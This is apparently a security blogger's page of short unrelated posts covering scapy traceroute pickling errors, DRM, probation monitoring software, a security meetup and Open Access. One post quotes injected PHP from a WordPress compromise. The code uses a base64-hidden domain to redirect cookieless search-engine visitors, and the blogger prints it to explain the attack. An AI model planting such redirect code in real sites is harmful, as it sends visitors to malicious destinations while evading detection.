Zeroday 01100100011010010

Use of application “Scrabulous” has been restricted

We’re sorry, but this application is not available to you. Please visit the Application Directory to find other applications.

A friend of mine sent in a script that worked for him.


#!/usr/bin/env python

# unpickler
f = open(”/tmp/pickle-out”, “r”)
u = pickle.Unpickler(f)
tr = u.load()
print ” Original tr:—————————-”
tr.display()


I still couldn’t get this to work on my Ubuntu box. However in a later chat with my colleague Elphine I found out that Ubuntu had it’s own package for scapy. So I used apt-get to install scapy and this time it DID work. This is great since now I can start sticking objects into a database and move on to the next task of combining arbitrary traceroutes for the purposes of making graphs. I’m still curious why this didn’t work when I simply downloaded the scapy.py code and executed it. Once I get some working code I’ll post it here.

Some of the projects I am working on require that I gather data about particular addresses on the Internet. One method I’ve been experimenting with is scapy’s traceroute function which allows for neat graphing  secdev.org]. One can also combine two arbitrary traceroutes for graphing as simply as:


traceroute1, unans = traceroute([1.2.3.4])
traceroute2, unans = traceroute([5.6.7.8])
combined_traceroutes = traceroute1 + traceroute2


So for me the next logical step was to start storing all the traceroutes in a database so I could combine two or more at will and see interesting things. Not only could I see differences in different paths but I could even see changes of a single path over time! I fought with scapy for a while and finally realized that the export_object and save_object functions are wrappers for cPickle. I’m not entirely familiar with Pickle so I’ve had to do some reading on the topic. So far it does not look promising. No one has come up with a solution for this just yet although there are some promising recipes in the O’Reilly “Python Cookbook” which touch on this subject in a more abstract way. ["Using the cPickle Module on classes and Instances"]

I’ll document some of the errors in case someone else decides to try this and wants to save some time:

>>> export_object(trace)
Traceback (most recent call last):
File “”, line 1, in
File “scapy.py”, line 867, in export_object
print base64.encodestring gzip.zlib.compress(cPickle.dumps(obj,2),9))
PicklingError: Can’t pickle : attribute lookup __builtin__.function failed


Another casualty is being reported on the DRM front. Yahoo Music is shutting down it’s authentication servers which means those who purchased music will not be able to transfer the music to another computer. This will not affect all of Yahoo Music’s former customers initially but once they need to reinstall their OS or purchase a new computer the inability to move the music will become more clear. Yahoo’s reputation will likely suffer from this as the complaints start finding homes in various blogs and news stories. A better move on Yahoo’s part would have been to simply un-DRM the music for their customers before going dark. I would think that the possibility of a class action lawsuit would be enough economic incentive to invest in the relatively cheap process of providing uncrippled versions of the products they sold to their customers.

A friend shared an interesting post with me from Ars Technica about a recent torrent website owner getting jailtime .

One of the more interesting facts from the article was the disposition of a previous case in 2007 which somehow escaped my attention back then. Scott McCausland was forced to have his computer monitored as a condition of his probation. He noted in his blog that, “their software doesn’t support GNU/Linux (which is what I use). So, he told me that if I want to use a computer, I would have to use an OS that the software can be installed on.”
I think there is a snarky lesson in all of this. Windows is the choice of those who want to monitor your every move. Irony aside McCausland “added a donation link to his blog to help pay for the cost of a Windows license.” This is a very real additional cost that wasn’t really considered by the judge. I’ve complained about this privately when the Extension School at Harvard offered a statistics class which only allowed the use of a Windows based statistics program. This was not known to me when I signed up and I subsequently withdrew from the course (costing me both time and money) because I refused to deal with a Windows only learning environment.

I really love the Enormous Room but recently they decided to cut off the food supply upstairs. This caused the Beansec team to ponder for a while and we have decided that we will now make Middlesex the new home of our humble little gathering. The food at Middlesex is good and the seating is really flexible.

All that said I hope to see you guys at Middlesex Lounge this Wednesday for Beansec.
Also see the announcement done with more flair at Hoff’s blog:
 http://rationalsecurity.typepad.com/blog…

I suppose it is inevitable that once a marketplace gains a certain amount of traction scammers will follow. I have listed a PSP on my facebook account for a while now and I just had a really exciting offer made. For the mother of a teenager she is in remarkably good shape.

Found this great little commentary while researching the write() method in REXML:

ie_hack: Internet Explorer is the worst piece of crap to have ever been written, with the possible exception of Windows itself. Since IE is unable to parse proper XML, we have to provide a hack to generate XML that IE‘s limited abilities can handle. This hack inserts a space before the /> on empty tags. Defaults to false

Thanks to co-author Brandon Palmen for the heads up to a Wordpress hack in progress. The attackers are using a few obfuscation tricks to inject code into Wordpress installations using a recently announced vulnerability. More details in a well written write up here.

The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:


<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");

if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>


This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.

Peter Suber has written a great post that should be read by anyone interested in education, open source, or what is known as Open Access. In my younger days I listened to the mantra of hacker lore, “Information wants to be free” and so the ideals of Open Access are quite appealing. This mantra seems to have mutated for me and today I personally believe that “Knowledge wants to be free”. Peter points out that, “In the age of print, publishers could control access to research they did not conduct, write up, sponsor or purchase. One reason is that publishers controlled all the effective channels of distribution; but that has changed.”